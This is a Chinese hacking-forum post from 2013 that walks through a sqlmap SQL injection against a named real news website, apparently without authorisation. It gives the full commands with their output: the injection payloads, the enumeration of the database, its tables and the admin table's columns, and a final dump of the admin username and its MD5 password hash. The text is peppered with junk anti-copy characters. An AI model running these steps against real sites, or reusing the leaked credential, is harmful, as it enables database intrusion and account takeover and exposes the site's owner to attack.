找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2424|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: a2 L5 `* u; O" Vms "Mysql" --current-user       /*  注解:获取当前用户名称
% f* V- C7 t- k$ G    sqlmap/0.9 - automatic SQL injection and database takeover tool
3 T( Y- Z# W+ f2 l+ h( @    http://sqlmap.sourceforge.net
  • starting at: 16:53:54' [. l: |4 d9 Z% }
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 l# f. z# Q% T- H" k
    session file
    ; p! }% @8 L" a: ]+ H[16:53:54] [INFO] resuming injection data from session file& L! T: \" r, L% \& G+ H/ E" w$ k: {
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& M3 D) r6 Q4 B! b
    [16:53:54] [INFO] testing connection to the target url9 ^/ i, h) W9 ?
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    + n# S  y7 H2 ?7 b+ S# Qsts:
    9 p! R, m- R% g  o3 z; n8 P5 g* J---) W' c9 {+ Y& l: z% c
    Place: GET3 Z: K# }# k7 `3 _
    Parameter: id- ]! s* O, f/ `
        Type: boolean-based blind: u; C! q" l  \$ u' H
        Title: AND boolean-based blind - WHERE or HAVING clause# m0 W8 I* N& W# N% Z
        Payload: id=276 AND 799=7992 j; G+ t7 ?& A6 ?4 R! R
        Type: error-based
    : K+ q; S$ r3 w, s    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 o7 j. d/ j& A7 M& u
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ' H( C4 S2 w* O/ c/ f! G/ d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) Q4 f9 N& g- D) ]
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    5 o" L4 s7 h' r' _. r8 t9 f    Type: UNION query0 x- ?9 [2 H. f
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ! \" N8 z8 G& n4 e8 g, @    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    + {1 F; A& l0 f' r; M  V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / f- w* ^3 M3 {$ b4 L( r: @" JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ R$ x  {3 {7 x# b5 n5 v9 m( U0 o
        Type: AND/OR time-based blind
    1 J' l5 a$ l3 W4 z4 b$ v    Title: MySQL > 5.0.11 AND time-based blind
    3 P& ~+ ~9 G" I8 r; g, P; s% {    Payload: id=276 AND SLEEP(5)2 N- J; [2 _0 w# t
    ---
    5 m2 u2 J0 h, s- O' _1 O* E# b[16:53:55] [INFO] the back-end DBMS is MySQL3 t9 `: R5 k3 ~
    web server operating system: Windows4 M) p/ h3 Z4 w) Z
    web application technology: Apache 2.2.11, PHP 5.3.0. Y9 W( N* f) M2 n/ A6 Y
    back-end DBMS: MySQL 5.0
    , S; P* B4 f: S* l- T1 C- i; {& d[16:53:55] [INFO] fetching current user  a3 y- G; X4 Y! a' T
    current user:    'root@localhost'   3 [& L# F3 ^# I- n
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    " r' T$ s- B$ O6 _3 B8 F- Y* ^( |2 xtput\www.wepost.com.hk'
  • shutting down at: 16:53:58/ G' p4 S  z  a5 c( J( R
    3 Q3 X- J$ M# o' `8 n
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # r" B* t3 W/ k5 h: j+ l+ P7 X/ lms "Mysql" --current-db                  /*当前数据库2 e8 ^. K4 R! n5 T
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    % J7 ?! Y$ l" W) M: L    http://sqlmap.sourceforge.net
  • starting at: 16:54:161 M/ _, S$ Q/ k' y. J. e
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    2 w% m$ b7 D8 z3 | session file
    # a6 }& v/ m# Y3 p8 G, v! k[16:54:16] [INFO] resuming injection data from session file0 z  D7 M1 r1 W8 \6 b; A2 H6 K
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    + r* l5 ?" t5 P7 x0 T  c: u" F[16:54:16] [INFO] testing connection to the target url# B9 ^& q1 u0 t' {. P# |" b% V0 K
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    & E9 d& H8 B  k0 C4 @sts:1 K" Z, }. x$ r
    ---
    ! P4 ~% i7 `! a1 kPlace: GET
    ) i, q8 K- \9 v, @/ nParameter: id- y& ^' Y9 U  J; F2 b
        Type: boolean-based blind
    . m! X- B/ k1 X* O    Title: AND boolean-based blind - WHERE or HAVING clause2 G8 I8 Z, w! J5 v% Q* B  T4 l; [
        Payload: id=276 AND 799=799* O3 O7 K% M/ H* G6 R, {
        Type: error-based
    ! a, k" ^7 s; p4 A0 F) h    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  _# w6 b1 T7 j
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    $ V5 h7 A( _8 |8 T+ Q8 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
      G4 a  K  P4 N2 X# R  O" y* N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). z! u2 c! _9 X; q7 |! m+ p
        Type: UNION query
    ' X2 X0 l/ _; |4 F  D    Title: MySQL UNION query (NULL) - 1 to 10 columns' ^4 ^: S+ }5 C* V2 v
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    - Y: `) e/ F2 ]' |0 L+ A, g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: @+ ?& v) v5 m0 t0 k  s
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    2 T9 T" `+ w1 y! j9 |$ z2 |- V    Type: AND/OR time-based blind# W4 Z4 y/ k) O3 K
        Title: MySQL > 5.0.11 AND time-based blind
    : [- q' r' L1 ?5 D    Payload: id=276 AND SLEEP(5)" |7 [5 ^! b* i
    ---' E4 w; M* V7 C# Y, [0 `2 w
    [16:54:17] [INFO] the back-end DBMS is MySQL
    * N0 |  n) J5 ?" ]* G, cweb server operating system: Windows2 B" k- X! H: R. \- ^+ g1 M7 K2 P3 `# ?
    web application technology: Apache 2.2.11, PHP 5.3.05 L7 \' ~# r+ {6 c
    back-end DBMS: MySQL 5.0
    : i, y- J; F0 ^- |% n: _# d[16:54:17] [INFO] fetching current database9 Y- C2 |/ |; c% \. n0 y* I
    current database:    'wepost'! f. |4 F; g$ `& t9 g
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 v- O; j, y# A/ \5 d
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:186 W7 J2 v2 U# N3 m2 {# w0 T
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; t+ |& I% q# _
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名& ^9 a( b& Q) W# @: E
        sqlmap/0.9 - automatic SQL injection and database takeover tool3 [3 k" s& [0 ^6 u( r) a1 b( Z2 S
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    , A& R0 J  C+ o) @0 S: j5 P# @) S[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 e4 ~6 m+ Z+ \$ ?
    session file
    % M$ f- j% T$ }[16:55:25] [INFO] resuming injection data from session file9 T: E; w( @0 J5 A6 `: n
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    1 v# r7 x2 H& b& J" x# A/ ?[16:55:25] [INFO] testing connection to the target url
    * s' f1 |& @. a& Y% x+ S) P% r. Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque% l8 @  i* q9 S0 J, u$ O3 w  g
    sts:
    & E3 B8 \5 P. ~1 l# a# k---5 X5 _0 ^9 R) P
    Place: GET6 G! g4 U9 E. o9 i
    Parameter: id4 B& |4 U! L  q- e" q) B( j
        Type: boolean-based blind
    & {' Y  F/ T* F9 `! `% @    Title: AND boolean-based blind - WHERE or HAVING clause
    , h+ F1 W; x1 U7 L    Payload: id=276 AND 799=799! ]8 ^. B, i3 N: Y0 P- Z0 z
        Type: error-based5 h' ?- P6 C$ T+ y1 B
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    + }% ?, k* x$ |- e0 O2 q, O    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
      W! U. P+ l# U120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( n: k) g& y7 U# k/ q5 d1 W$ f
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 @  l8 n0 S, u8 x2 c$ l, p- l. e4 u
        Type: UNION query
    5 Y& f" U6 C6 A, c; _7 s+ A% d: @    Title: MySQL UNION query (NULL) - 1 to 10 columns6 z6 N1 p5 Q" O3 |  b, Y  N
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: v! |8 q- Q* Q+ N) B$ S1 q
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    % y. J' K( |  x( q) L9 sCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    9 E8 b) m$ p; x4 |    Type: AND/OR time-based blind+ [, k/ c& n' t5 ^
        Title: MySQL > 5.0.11 AND time-based blind0 F4 u6 y2 [0 o& G- t
        Payload: id=276 AND SLEEP(5)# A) [" j+ {% a" s6 T
    ---0 `' m8 N7 H# F" b$ F+ X
    [16:55:26] [INFO] the back-end DBMS is MySQL
      S0 i7 X) Y: ]6 iweb server operating system: Windows
    , {; g' A5 ~; y" R& ]! g! E/ B( Xweb application technology: Apache 2.2.11, PHP 5.3.0" e3 l/ E$ ?& E% q
    back-end DBMS: MySQL 5.0% o- T9 T( k8 \7 [. |! `3 @; }/ E. R- [
    [16:55:26] [INFO] fetching tables for database 'wepost'2 k6 E& X- T7 C$ R8 K
    [16:55:27] [INFO] the SQL query used returns 6 entries! z# a  l! b& a5 R. n( J: }
    Database: wepost7 j; a2 g8 A1 U/ l9 [  g4 \! f5 y
    [6 tables]; O% Z; `) S; |3 x) Y; m% u( T
    +-------------+
    ; Q' Q: _: w* j$ G; s5 }| admin       |
    $ v" t1 z% R) j7 F| article     |
    ( k# @1 i( T6 \- U. n0 n0 S| contributor |
    2 `2 {: q) O; W& G/ v2 a/ Q8 K5 a* s| idea        |; M! d8 z8 F4 g( O3 Z0 n
    | image       |/ z/ V, M4 o) }" I! j3 X0 c* E3 w
    | issue       |
    ! ?6 u7 O: L8 A3 Q- S+-------------+
    : t: \2 z2 T# Z$ [0 A9 a[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( M2 c. ]" h' V
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    . Q* p" t  m4 j7 S1 s" ~0 h$ k, v
    7 E( i* V1 a2 _2 {- {+ K4 @9 }. jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    , t2 X& B& b' R& }ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    # t9 U8 O+ _7 T  Z* X! s/ `    sqlmap/0.9 - automatic SQL injection and database takeover tool: @# i2 Y* ]0 ~+ O2 A
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    - ?2 O% m$ e! Z; Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    # i9 `) Y5 F' H& wsts:
    " L3 A9 Q+ k' u( M7 k' g---9 U8 k2 R1 r2 A5 S4 X
    Place: GET' D; h" N% p( K: [' m
    Parameter: id, @8 r; P, Q0 u3 d# O& V/ j8 R: i
        Type: boolean-based blind
    % V; M6 R, A! N% @$ M% y    Title: AND boolean-based blind - WHERE or HAVING clause# q$ z) M' ^/ X0 q0 e
        Payload: id=276 AND 799=7996 q; {& j, U' l5 b5 p  ~7 j
        Type: error-based
    4 v' @# n+ `$ Q  R5 }, e( `5 |# v    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    $ E8 {$ u9 L( O) ^- f4 l    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ; D  M: F) J4 s1 r7 _- f3 z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    $ S$ K# H, e' O" t),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ( ?3 V1 U' S9 \5 ~% \3 g    Type: UNION query8 y+ x2 a+ w9 ~2 B
        Title: MySQL UNION query (NULL) - 1 to 10 columns. ^' V: L0 W! R% p" ]6 D4 _
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 b& O0 Q: X* Q# S) Q5 ~
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# u+ F7 [4 k* o: Z/ K& D, F
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / _. ?/ x% r9 i8 q6 e9 x1 U! l    Type: AND/OR time-based blind# v# f# I6 |: }; x7 }  \
        Title: MySQL > 5.0.11 AND time-based blind2 H) _+ x5 L/ Z' t. ^& `
        Payload: id=276 AND SLEEP(5)
    ! A7 k8 c: u* g, I---
    ' t& d- n2 R" |- P. zweb server operating system: Windows
    % f) s1 u  `! f! p% y  n) {web application technology: Apache 2.2.11, PHP 5.3.0
    % ?, y9 P, O1 `, ]back-end DBMS: MySQL 5.0% t7 a4 M; T, H0 _) i
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    0 l) N" e  X* h$ ]6 p& assion': wepost, wepost
    % V: s  w3 O( v3 a' nDatabase: wepost+ H; q! x9 G  U/ N
    Table: admin! D7 @& j: P/ r- _  A" |  f
    [4 columns]
    ( t5 g) k$ b4 k. j6 F" G2 }+----------+-------------+; D, w+ A( G# b: C5 z! g
    | Column   | Type        |0 ^7 I9 O: L$ |. O4 A
    +----------+-------------+9 N0 B4 R- F/ f: H) Q8 Z
    | id       | int(11)     |
    7 s2 V! J8 Z+ P8 I' ]| password | varchar(32) |
    5 s5 f  @; @: l4 ]& F. i0 ]# y| type     | varchar(10) |
    ; S' x# H$ c) t" ^8 v; w| userid   | varchar(20) |
    6 y. K; w8 c! Y" `3 O+----------+-------------+- i! T5 t: H9 @
  • shutting down at: 16:56:19
    4 h' ^! N9 S, `% o8 [" z8 s
    " h8 l. F0 B. a3 h- D# U. _# @; [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ( u+ u2 }% o, b( R/ Z" xms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    2 x+ @& r/ {, s( |: K8 h; l0 p! K    sqlmap/0.9 - automatic SQL injection and database takeover tool
      {& E+ F% d, i- d    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    9 s0 p" w4 Y; D& w8 Isqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / e5 y8 s  Z- h$ \) v5 Nsts:
    ' x& G" [% a7 A---* T) X# q- B) L3 n& t  A* C7 |$ O
    Place: GET/ A; F  A; ?1 D: e% i9 a0 B
    Parameter: id' U' k$ q, O1 K% o% o  x3 @
        Type: boolean-based blind
    + \+ F. W' K, w# ~    Title: AND boolean-based blind - WHERE or HAVING clause7 y& }) u/ U( a8 E( p5 _+ s
        Payload: id=276 AND 799=799, \. X4 r& m. o5 k! q8 M7 U
        Type: error-based
    : o. ?7 t. p4 I    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      ?( L6 V3 ]5 h+ x: g    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    * {" |4 j: a/ @. S  S' w: B; R: v  i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. f* o9 A2 r7 T7 N
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 S6 E9 E0 K9 K8 W    Type: UNION query* C+ b+ ]) L( T
        Title: MySQL UNION query (NULL) - 1 to 10 columns+ d; ]5 }! h) `5 m
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 T% C% f( [  G4 n5 K. i9 f
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ( g7 w7 {5 n" q8 R& K& C) a# PCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) \; d  X' X# ?. b
        Type: AND/OR time-based blind
    : N) g  e. ]7 e& @    Title: MySQL > 5.0.11 AND time-based blind
      n; E2 K! k4 ~! r+ o    Payload: id=276 AND SLEEP(5)
    " d3 b) D  y' M- O. ]* [3 b1 a---& ?) A/ n: X+ W, U
    web server operating system: Windows
    ) u2 t8 i9 m4 @web application technology: Apache 2.2.11, PHP 5.3.0
    " r0 H+ j+ I7 X0 \6 qback-end DBMS: MySQL 5.0
    0 L5 C6 R7 q( U4 m- Grecognized possible password hash values. do you want to use dictionary attack o
    ; i7 G1 _- U2 m5 `- E* qn retrieved table items? [Y/n/q] y7 b, `- Y" h6 z3 n
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    , A3 ~' |$ T  B* Ydo you want to use common password suffixes? (slow!) [y/N] y: d1 z0 r5 I1 p! G1 W6 ], }
    Database: wepost7 Q, ]3 S" D9 K1 Z1 {" z
    Table: admin
    2 a& J% Y( W2 U* m2 p0 r( m6 u. p[1 entry]
    9 K. U3 f- Z& J+----------------------------------+------------+; D3 p% {+ ~8 v7 u' ~
    | password                         | userid     |
    1 i" {: i; d: N) T+----------------------------------+------------+1 |% ?  F8 U# ?7 Z. W
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    * A- W. I: M$ m' L7 z9 Q) n+----------------------------------+------------+
    . l4 r) A/ K1 H* h2 e) C
  • shutting down at: 16:58:144 S9 [( a9 p4 h, P( _
    + V% k" _' e" H
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表